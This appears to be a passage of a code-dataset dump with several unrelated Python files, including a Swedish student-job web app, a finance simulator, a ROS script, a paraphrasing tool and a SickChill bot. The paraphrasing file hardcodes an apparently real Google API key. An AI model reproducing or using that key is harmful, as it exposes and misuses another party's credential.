addmod.get_denied_missions(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('student_start',finished_ads=ads_finished, avail_ads=ads_to_apply_on, accepted_on=ads_ongoing, pending_ad=ads_untreated, user_id=userid, user=username, level=\"student\", pageTitle = 'Start', denied_missions=denied_missions)\n\n\telse:\n\t\temployer_ads = addmod.get_my_ads(userid, cursor)\n\t\tstudents = addmod.students_that_applied(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('employer_start', user=username, user_id=userid, level=\"arbetsgivare\", annons=employer_ads, pageTitle = 'Start', students_application = students)\n\n@route('/about_us')\ndef about_us_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('about_us', pageTitle = 'Om Questway', user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\t\thang_up_on_database()\n\t\treturn template('about_us', pageTitle = 'Om Questway', user=username, user_autho=user_level, user_id=userid)\n\n@route('/help')\ndef help_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\t\thang_up_on_database()\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user = username, user_autho=user_level, user_id = userid)\n\n'''********Create-user********'''\n@route('/create')\ndef create_user():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_user', pageTitle='Student | Uppdragsgivare')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_student')\ndef create_student():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_student', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_employer')\ndef create_employer():\n\t#Skriven av Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_employer', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/ajax_create_user', method=\"POST\")\ndef ajax_create_validation():\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tresult = handleUsers.ajax_new_user_validation(cursor)\n\thang_up_on_database()\n\tif result['result'] == False and result['error'] == 'Bad input':\n\t\treturn 'Bad input'\n\telif result['result'] == False and result['error'] == 'User exists':\n\t\treturn 'User exists'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_create_user/', method = 'POST')\ndef do_create_user(user):\n\t#Skriven av Jacob\n\tglobal db\n\tif log.is_user_logged_in()==False:\n\t\tcursor = call_database()\n\t\tif user == \"student\":\n\t\t\tresponse = handleUsers.create_student(cursor)\n\t\telif user == \"employer\":\n\t\t\tresponse = handleUsers.create_employer(cursor)\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(\"Något har blivit fel!\")\n\t\tdb.commit()\n\t\tif response['result'] == True:\n\t\t\tlog.log_in_new_user(response['email'], response['password'], cursor)\n\t\t\thang_up_on_database()\n\t\t\tredirect('/admin')\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(response['error'])\n\telse:\n\t\tredirect('/admin')\n\n@route('/profiles/')\ndef profiles(user):\n\t#Skriven av Jacob\n\ttry:\n\t\tuser = int(user)\n\texcept:\n\t\treturn return_error('Användaren finns inte!')\n\n\tcursor = call_database()\n\tuser_profile_data = handleUsers.show_student_profile(user, cursor)\n\tis_user_logged_in = log.is_user_logged_in()\n\n\tgrading_ads = addmod.grading_ads(user, cursor)\n\tgrading_skills = addmod.get_ad_skills(user, cursor)\n\tusername = \"\"\n\tthis_user = False\n\tif is_user_logged_in == True:\n\t\tuser_levle = log.get_user_level(cursor)\n\t\tusername = log.get_user_name(cursor)\n\t\tlogged_in_id = log.get_user_id_logged_in()\n\t\tif logged_in_id == user:\n\t\t\tthis_user = True\n\telse:\n\t\tuser_levle = 0\n\n\thang_up_on_database()\n\n\tif user_profile_data['exists'] == True:\n\t\teducation_info = user_profile_data['education_info']\n\t\tstudent_info = user_profile_data['student_info']\n\t\tstudent_name = student_info[0] + ' ' + student_info[1]\n\t\treturn template('user_profile', user = username, user_autho = user_levle, user_id = user, student= student_info, education = education_info, pageTitle = student_name, grading = grading_ads, grading_skills = grading_skills, this_user=this_user )\n\n\telse:\n\t\treturn return_error('Användaren finns inte!')\n\n@route('/edit_mission//', method=\"POST\")\ndef edit_mission(user,ad_id):\n\t#Skriven av Jacob\n\tglobal db\n\ttry:\n\t\tint(user)\n\t\tint(ad_id)\n\texcept:\n\t\treturn return_error('Något har blciti fel!')\n\tlog.validate_autho()\n\tif int(log.get_user_id_logged_in()) == int(user):\n\t\tcursor = call_database()\n\t\taddmod.edit_mission(ad_id, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/profiles/' + str(user))\n\treturn return_error('Ej behörighet!')\n\n\n'''********Ad-management********'''\n\n@route('/do_new_ad')\ndef do_new_ad():\n\t#Skriven av Jari\n\t'''Returns a view where the logged-in employer can fill in information for a new ad'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tusername=log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('adsform.tpl',user=username, pageTitle = 'Annonser')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/make_ad', method=\"POST\")\ndef ad_done():\n\t#Skriven av Jari\n\t'''Creates a new ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.do_ad(cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n\n@route('/make_ad')\ndef no_get():\n\t#Skriven av Jari\n\tredirect('/admin')\n\n\n'''*****Delete ad*****'''\n\n@route('/del_ad/', method=\"POST\")\ndef del_ad(which_ad):\n\t#Skriven av Jari\n\t'''Deletes a specifik ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_logged_in=log.get_user_id_logged_in()\n\t\taddmod.erase_ad(which_ad, user_logged_in, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n'''****Students can apply on an ad****'''\n\n@route('/apply_on_ad/', method=\"POST\")\ndef apply_for_mission(which_ad):\n\t#Skriven av Jari\n\t'''Onclick on template - student applies on a specifik ad'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.applying_for_mission(which_ad, cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n'''****All the ads and their applications listed***'''\n\n@route('/allMissions')\ndef list_applied_students():\n\t#Skriven av Jari\n\t'''lists all ads with their specific application status'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_id=log.get_user_id_logged_in()\n\t\tusername=log.get_user_name(cursor)\n\t\trelevant_adds=addmod.get_my_ads(user_id, cursor)\n\t\tstudents_application = addmod.students_that_applied(user_id, cursor)\n\t\tfeedback_info = addmod.get_given_feedback_for_employers(user_id, cursor)\n\t\thang_up_on_database()\n\t\treturn template('adds.tpl',user_id=user_id, user=username, adds=relevant_adds, students=students_application, pageTitle='Alla uppdrag', feedback = feedback_info)\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/select_student//')\ndef accepted_ones(ad, appliersID):\n\t#Skriven av Jari\n\tglobal db\n\tcursor = call_database()\n\tif log.get_user_level(cursor) == 2:\n\t\taddmod.who_got_accepted(ad, appliersID, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect ('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/ad_done/', method=\"POST\")\ndef ad_done(ad):\n\t#Skriven av Jari\n\tglobal db\n\ttry:\n\t\tint(ad)\n\texcept:\n\t\treturn return_error('Nu har något blivit fel!')\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tresponse = addmod.move_ad_to_complete(int(ad), cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tif response['response'] == False:\n\t\t\treturn return_error(response['error'])\n\t\telse:\n\t\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/give_feedback/')\ndef give_feedback(ad_nr):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2 and log.get_user_id_logged_in() == addmod.get_ad_creator_id(cursor, int(ad_nr)):\n\t\tusername = log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('feedback', adnr=ad_nr, pageTitle = 'Ge feedback', user=username )\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\ndef return_error(error_message):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tif log.is_user_logged_in == True:\n\t\tuserid = log.get_user_id_logged_in()\n\t\tuser_level = log.get_user_level(cursor)\n\t\tusername = log.get_user_name(cursor)\n\t\treturn template('error_message', pageTitle = error_message, user = username, user_autho = user_level, user_id = user, error_message=error_message)\n\telse:\n\t\treturn template('error_message', pageTitle = error_message, user_autho = 3, error_message=error_message)\n\n\n'''********Övriga Routes********'''\n\n@error(404)\ndef error404(error):\n return template('pagenotfound', pageTitle = 'Fel!' )\n\n@route('/static/')\ndef server_static(filename):\n return static_file(filename, root=\"static\")\n\n\napp = SessionMiddleware(app(), log.session_opts)\nrun(app=app)\n","repo_name":"j-j-hoff/Questway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73686857448","text":"maior = 0\nmenor = 0\nnumeros = []\nfor x in range(0, 5):\n numeros.append(int(input('Digite um número inteiro: ')))\n if x == 0:\n maior = menor = numeros[x]\n elif numeros[x] > maior:\n maior = numeros[x]\n elif numeros[x] < maior:\n menor = numeros[x]\nprint(f'A lista de números digitadas foi {numeros}')\nprint(f'O maior número foi {maior} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == maior:\n print(f'{p}...', end='')\nprint(f'\\nO menor número foi {menor} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == menor:\n print(f'{p}...', end='')","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex078b.py","file_name":"ex078b.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"340366978","text":"config, instructions = [part.split(\"\\n\") for part in open(\"input.txt\", \"r\").read().split(\"\\n\\n\")]\nstacks = [[] for i in range(max([int(s) for s in config[-1].split() if s.isdigit()]))]\nfor line in config[:-1]:\n for i, box in enumerate(line[1::4]):\n if box != ' ': stacks[i] += box\n \nstack1, stack2 = stacks[:], stacks[:]\nfor line in instructions:\n n, src, dest = [int(s) for s in line.split() if s.isdigit()]\n stack1[src-1], stack1[dest-1] = stack1[src-1][n:], stack1[src-1][:n][::-1] + stack1[dest-1]\n stack2[src-1], stack2[dest-1] = stack2[src-1][n:], stack2[src-1][:n] + stack2[dest-1]\n\nprint('Task 1: ', ''.join(s[0] for s in stack1 if s))\nprint('Task 2: ', ''.join(s[0] for s in stack2 if s))","repo_name":"rklimpel/Advent-of-Code-2022","sub_path":"05/fancy.py","file_name":"fancy.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23589889074","text":"import numpy as np\nimport sys\nimport numba\n\ndef simulate_gbm(n, s, r, div_yield, t, t_terminal, dt, sigma, method = \"euler\", seed = None):\n \"\"\"\n Simulate a geometric brownian motion path\n :param n: Number of simulations\n :param s: Stock price at time t\n :param r: Risk free interest rate\n :param div_yield: Continuous dividend yield\n :param t_terminal: Terminal time\n :param t: Starting time\n :param dt: Discretization time step size\n :param sigma: Volatility\n :param method: Simulation method, either \"euler\" or \"milstein\"\n :param seed: Random seed used\n :return: An array containing the n simulations as rows and the time steps as columns\n \"\"\"\n\n # Set the seed\n if seed is not None:\n np.random.seed(seed)\n\n # Total time steps\n t_total = int((t_terminal - t) / dt)\n\n # Random normal generation\n z = np.random.randn(n, t_total)\n\n # Fill in the simulation matrix\n s_t = dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method)\n\n return s_t\n\n\ndef dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method):\n '''\n Dispatch the simulation to the appropriate algorithm\n :return: s_t filled with the simulation values\n '''\n\n if method == \"euler\":\n\n s_t = simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z)\n\n elif method == \"milstein\":\n\n s_t = simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z)\n\n else:\n\n sys.exit(\"Method not supported.\")\n\n return s_t\n\n\ndef simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Euler discretization\n :return: s_t filled with the simulation values by Euler\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z,\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t\n\n\ndef simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Milstein discretization\n :return: s_t filled with the simulation values by Milstein\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z \\\n + .5 * sigma * sigma * ((np.sqrt(dt) * z) ** 2 - dt),\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t","repo_name":"DavisVaughan/uncc-math-6204","sub_path":"assignments/hw-03 efficient/gbm_simulator.py","file_name":"gbm_simulator.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18564363775","text":"#!/usr/bin/env python\n\nimport rospy\nfrom rospy import Time, Duration\nfrom geometry_msgs.msg import Twist, Pose\nfrom nav_msgs.msg import Odometry\nimport math\nfrom datetime import datetime\nimport time\n\n\ndef zad1():\n VEL_LIN = 0.08*2.4\n VEL_ANG = 0.09*2.4\n\n TURN_RIGHT = 0\n SIDE_LENGHT = 1.0\n\n pub = rospy.Publisher('key_vel', Twist, queue_size=10)\n sub = rospy.Subscriber(\"/mobile_base_controller/odom\", Odometry, callback)\n rospy.init_node('zad1', anonymous=True)\n rate = rospy.Rate(50) # 10hz\n\n vel = Twist()\n\n i = 0\n while not rospy.is_shutdown():\n i+=1\n global time_now\n if i>2:\n \n now = rospy.Time.now()\n time_now = now.secs + float(now.nsecs)/1000000000\n lin, ang = go_square(SIDE_LENGHT, TURN_RIGHT, VEL_LIN, VEL_ANG)\n vel.linear.x = lin\n vel.angular.z = ang\n\n if i == 2:\n global start_time\n now = rospy.Time.now()\n start_time = now.secs + float(now.nsecs)/1000000000\n \n pub.publish(vel)\n rate.sleep()\n\n\ndef callback(data):\n global pose\n pose = Pose()\n pose = data.pose.pose\n\n\ndef calc_time_lin(a, vel_lin):\n return a/vel_lin\n\n\ndef calc_time_ang(vel_ang):\n return (math.pi/2)/vel_ang\n\n\ndef go_square(side_lenght, turn_right, vel_lin, vel_ang):\n global start_time\n\n TIME_LIN = calc_time_lin(side_lenght, vel_lin)\n TIME_ANG = calc_time_ang(vel_ang)\n\n duration = time_now - start_time\n print(duration)\n if duration < TIME_LIN:\n lin = vel_lin\n ang = 0\n elif duration >= TIME_LIN and duration <= TIME_LIN + TIME_ANG:\n lin = 0.0\n if turn_right:\n ang = -vel_ang\n else:\n ang = vel_ang\n else:\n start_time = time_now\n lin = 0\n ang = 0\n\n\n return lin, ang\n\n\nif __name__ == '__main__':\n try:\n zad1()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"kamil-szczepanik/Control-and-Simulation-of-Robots","sub_path":"mobile/scripts/lab1/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20561624329","text":"import os\nfrom abc import ABC, abstractmethod\nimport json\nimport argparse\nimport re\nfrom collections import defaultdict\n\n\nimport requests\nimport logging\nfrom html import unescape as htmlue\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom cat.simulation.nlg import common\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass AbstractParaphraser(ABC):\n ESCAPE_SYM = '#'\n ESCAPE_PATTERN = re.compile(f'{ESCAPE_SYM}([a-zA-Z_]*)')\n\n def __init__(self, name):\n self.name = name\n\n def paraphrase_file(self, input_path: str, output_path: str, compute_bleu=True):\n out_data = []\n with open(input_path, mode='r', encoding='utf-8') as sents_file:\n for line in sents_file.readlines():\n sent = line.strip('\\n').strip()\n logger.info(f'Input: {sent}')\n paraphrased = self.paraphrase_sentence(sent=sent)\n logger.info(f'Output: {paraphrased}')\n bleu = sentence_bleu([self._sent_to_tokens(paraphrased)],\n self._sent_to_tokens(sent)) if compute_bleu else None\n out_data.append({'input': sent, 'output': paraphrased, 'bleu': bleu})\n with open(output_path, mode='w', encoding='utf-8') as out_file:\n json.dump(out_data, out_file, indent=2)\n\n def _sent_to_tokens(self, sent, split_sym=' '):\n return sent.split(split_sym)\n\n def _escape_placeholders(self, sent: str) -> str:\n placeholders = common.get_template_placeholders(sent)\n escaped_placedholders = dict([(placeholder, f'{self.ESCAPE_SYM}{placeholder}') for placeholder in placeholders])\n return sent.format(**escaped_placedholders)\n\n def _unescape_placeholders(self, original: str, escaped: str) -> str:\n unescaped = self.ESCAPE_PATTERN.sub(r'{\\1}', escaped)\n tokenized = self._sent_to_tokens(unescaped)\n for i, token in enumerate(tokenized):\n if re.findall('{(.+?)}', token):\n lower_placeholder = token.lower()\n tokenized[i] = lower_placeholder\n unescaped = ' '.join(tokenized)\n original_ph = common.get_template_placeholders(original)\n new_ph = common.get_template_placeholders(unescaped)\n unknown_placeholders = set(new_ph) - set(original_ph)\n if len(unknown_placeholders) > 0:\n logger.error(f'Unknown placeholders {unknown_placeholders}')\n return None\n for ph in original_ph:\n if f'{{{ph}}}' not in unescaped:\n logger.error(f'Missing placeholder {{{ph}}} in back translation {unescaped}')\n return None\n return unescaped\n\n @abstractmethod\n def paraphrase_sentence(self, sent: str):\n pass\n\n @abstractmethod\n def paraphrase_word(self, token: str):\n pass\n\n\nclass PPDBParaphraser(AbstractParaphraser):\n PPDB_RAW = 'ppdb'\n PPDB_JSON = 'ppdb.json'\n\n def __init__(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n json_path = os.path.join(current_path, self.PPDB_JSON)\n if not os.path.exists(json_path):\n self._preprocess()\n with open(json_path, 'r') as f:\n self.paraphrases = json.load(f)\n AbstractParaphraser.__init__(self, 'ppdb')\n\n def _preprocess(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n raw_path = os.path.join(current_path, self.PPDB_RAW)\n ppdb_dict = defaultdict(list)\n with open(raw_path, 'r') as pp_file:\n for line in pp_file:\n columns = line.strip().split(' ||| ')\n if len(columns) < 6:\n continue\n if columns[5] != 'Equivalence':\n continue\n word = columns[1]\n paraphrase = columns[2]\n if paraphrase not in ppdb_dict[word]:\n ppdb_dict[word].append(paraphrase)\n dump_path = os.path.join(current_path, self.PPDB_JSON)\n with open(self.PPDB_JSON, 'w') as out_file:\n json.dump(ppdb_dict, out_file, sort_keys=True)\n\n def paraphrase_sentence(self, sent: str):\n paraphrased = []\n for word in self._sent_to_tokens(sent):\n paraphrase = self.paraphrase_word(word)\n paraphrased.append(paraphrase)\n return ' '.join(paraphrased)\n\n def paraphrase_word(self, token: str):\n possibilities = self.paraphrases.get(token, [])\n if len(possibilities) == 0:\n return token\n return possibilities[0] # random.choice(possibilities)\n\n\nclass AbstractPivotParaphraser(AbstractParaphraser, ABC):\n def __init__(self, name):\n AbstractParaphraser.__init__(self, name)\n\n\nclass GooglePivotParaphraser(AbstractPivotParaphraser):\n URL = 'https://translation.googleapis.com/language/translate/v2'\n API_KEY = 'AIzaSyA2AhHSZ5qCf-aJEPXczK2n2lMpS3Amlis'\n\n def __init__(self, languages):\n self.languages = languages\n AbstractPivotParaphraser.__init__(self, 'google')\n\n def paraphrase_sentence(self, sent: str) -> str:\n translation = self._multi_translation(sent, self.languages)\n return translation\n\n def paraphrase_word(self, word: str) -> str:\n translation = self._multi_translation(word, self.languages)\n return translation\n\n def _multi_translation(self, text: str, languages=['en', 'de', 'fr', 'zh-CN', 'en']) -> str:\n if len(set(languages)) < 2:\n raise Exception('Need at least one intermediate language for pivot paraphrasing but got ' + languages)\n base = self._escape_placeholders(text)\n translation = base\n for i in range(len(languages) - 1):\n src_lang = languages[i]\n target_lang = languages[i + 1]\n translation = self._query_translation(text=translation, source=src_lang, target=target_lang)\n return self._unescape_placeholders(text, translation)\n\n def _query_translation(self, text: str, source: str = 'en', target='de') -> str:\n params = {'q': text, 'source': source, 'target': target, 'key': self.API_KEY}\n r = requests.post(url=self.URL, data=params)\n if r.status_code == 403:\n return self._query_translation(text, source, target)\n response = json.loads(htmlue(r.text))\n translations = response.get('data', {}).get('translations', [])\n return [translation.get('translatedText', text) for translation in translations][0]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-q', '--query', type=str,\n help='Input query to paraphrase. Can contain escaped characters in curly brackets')\n parser.add_argument('-i', '--in_file', type=str, help='Line separated list of queries')\n parser.add_argument('-o', '--out_file', type=str, help='Output file to write json to')\n parser.add_argument('-l', '--languages', type=str, nargs='*',\n help='The languages to use for pivot translation. First languages is appended as target automatically. Language abbreviations are not validated')\n parser.add_argument('-b', '--bleu', type=bool, default=True, help='Wether to compute and log the BLEU score')\n parser.add_argument('-p', '--paraphraser', default='g',\n help='Type of paraphraser. \"g\" for Google Translate API, \"p\" for PPDB paraphraser')\n args = parser.parse_args()\n\n query = args.query\n in_file = args.in_file\n if query and in_file:\n logger.error('Can either specify query or input file to paraphrase')\n exit(1)\n if not (query or in_file):\n logger.error('Must either specify query or input file to paraphrase')\n exit(1)\n if args.in_file and not args.out_file:\n logger.error(f'Missing argument \"-o\"/\"--out_file\" for file paraphrasation')\n exit(1)\n\n languages = []\n paraphrase_type = args.paraphraser\n if paraphrase_type == 'p':\n p = PPDBParaphraser()\n elif not paraphrase_type == 'g':\n logger.warning(f'Unknown paraphraser type \"{paraphrase_type}\", using default paraphraser \"g\"')\n paraphrase_type = 'g'\n if paraphrase_type == 'g':\n languages = args.languages\n if not languages or len(set(languages)) < 2:\n logger.error('At least two languages required for pivot paraphrasing')\n exit(1)\n if not languages[0] == languages[-1]:\n languages.append(languages[0])\n p = GooglePivotParaphraser(languages=languages)\n\n if query:\n logger.info(f'Input Sentence: {query}')\n paraphrase = p.paraphrase_sentence(query)\n logger.info(f'Output Sentence: {paraphrase}')\n else:\n p.paraphrase_file(input_path=in_file, output_path=args.out_file, compute_bleu=args.bleu)\n","repo_name":"DataManagementLab/CAT","sub_path":"cat/simulation/nlg/paraphrasing.py","file_name":"paraphrasing.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70640602727","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"Unit tests for pypytextable.\"\"\"\n\nimport pytest\n\nfrom pytextable import _pytextable\n\n\ndef test_wrap_tex_environment():\n text = \"My custom text\"\n expected = f\"\\\\begin{{center}}\\n {text}\\n\\\\end{{center}}\\n\"\n assert _pytextable._wrap_tex_environment(\"center\", text) == expected\n\n\ndef test_wrap_tex_environment_cmd():\n text = \"My custom text\"\n cmd = \"lll\"\n expected = f\"\\\\begin{{tabular}}{{{cmd}}}\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert _pytextable._wrap_tex_environment(\"tabular\", text, cmd=cmd) == expected\n\n\ndef test_wrap_tex_environment_options():\n text = \"My custom text\"\n options = \"lll\"\n expected = f\"\\\\begin{{tabular}}[{options}]\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert (\n _pytextable._wrap_tex_environment(\"tabular\", text, options=options) == expected\n )\n\n\n@pytest.mark.parametrize(\"data\", [[[1, 2]], [[1, 2, 3]]])\ndef test_n_columns(data):\n assert len(data[0]) == _pytextable._get_num_columns(data)\n\n\ndef test_fail_columns():\n data = [\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3, 4),\n ]\n with pytest.raises(ValueError, match=\"All rows must have the same number\"):\n _pytextable._get_num_columns(data)\n\n\n@pytest.mark.parametrize(\n \"alignment, n_columns, expected\",\n (\n (\"l\", 3, \"lll\"),\n (\"r\", 2, \"rr\"),\n (\"c\", 4, \"cccc\"),\n (\"l|\", 3, \"l|l|l\"),\n (\"|l|\", 3, \"|l|l|l|\"),\n (\"\", 3, \"ccc\"),\n (\"llc\", 3, \"llc\"),\n (\"|ll|l|\", 3, \"|ll|l|\"),\n ),\n)\ndef test_table_alignment(alignment, n_columns, expected):\n assert _pytextable._table_alignment(alignment, n_columns) == expected\n\n\ndef test_fail_table_alignment_chars():\n with pytest.raises(ValueError, match=\"Invalid alignment\"):\n _pytextable._table_alignment(\"llb\", 3)\n\n\ndef test_fail_table_alignment_n_separators():\n with pytest.raises(ValueError, match=\"Too many |\"):\n _pytextable._table_alignment(\"|l|||\", 3)\n\n\n@pytest.mark.parametrize(\"alignment\", (\"ll\", \"llll\"))\ndef test_fail_table_alignment_n_chars(alignment):\n with pytest.raises(ValueError, match=\"Number of alignment\"):\n _pytextable._table_alignment(alignment, 3)\n","repo_name":"karlch/pytextable","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6641385426","text":"import requests\nimport json\nimport urllib\n\n\nclass sickChill(object):\n\n def __init__(self, couchURL, apikey, whitelistedusers):\n self.sickURL = couchURL\n self.apiKey = apikey\n self.users = whitelistedusers\n\n def begin(self, command, user):\n # make the command lower for all functions\n command = command.lower()\n response = None\n needs_help = False\n if user not in self.users:\n return \"This function is currently only avaliable to contributors to say thanks\"\n if 'tv today' in command:\n return self.getToday()\n elif 'tv latest' in command:\n return self.getLatest()\n elif 'tv search' in command:\n return self.getSearch(command.replace(\"tv search\", \"\"))\n elif 'tv download' in command:\n return self.getDownload(command.replace(\"tv download\", \"\"))\n elif command[-1] == '?':\n return \"No.\", False\n else:\n return \"Invalid Command\", False\n\n def getDownload(self, searchstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n download = sick.downloadTvShow(searchstr)\n if download == \"An existing indexerid already exists in database\":\n return \"Tv Show allready added\", False\n elif \"could not be parsed into\" in download:\n return \"Tv Show ID invalid, Full Error: \" + download, False\n elif \"queued to be added\" in download:\n return \"Success: \" + download + \"\\n *WARNING: This will only add future episodes, contact steve to add past episodes*\", False\n return download, False\n\n def getSearch(self, seachstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvshows = sick.searchTvShows(seachstr)\n if tvshows == \"Empty\":\n return \"No tvshows found\", False\n showlist = []\n for show in tvshows:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"name\"], \"value\": \"*First Aired:* \" + show[\"first_aired\"] + \"\\n*Allready added:* \" + show[\"in_show_list\"] + \"\\n*ShowID:* \" + str(show[\"id\"])})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getToday(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n if tvtoday == \"Empty\":\n return \"No shows airing today\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getLatest(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n tvlatest = sick.Latest()\n if tvtoday == \"Empty\":\n tvtoday = []\n if tvlatest == \"Empty\":\n tvlatest = []\n if len(tvlatest) == 0 & len(tvtoday) == 0:\n return \"Now shows in the next 7 days\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + 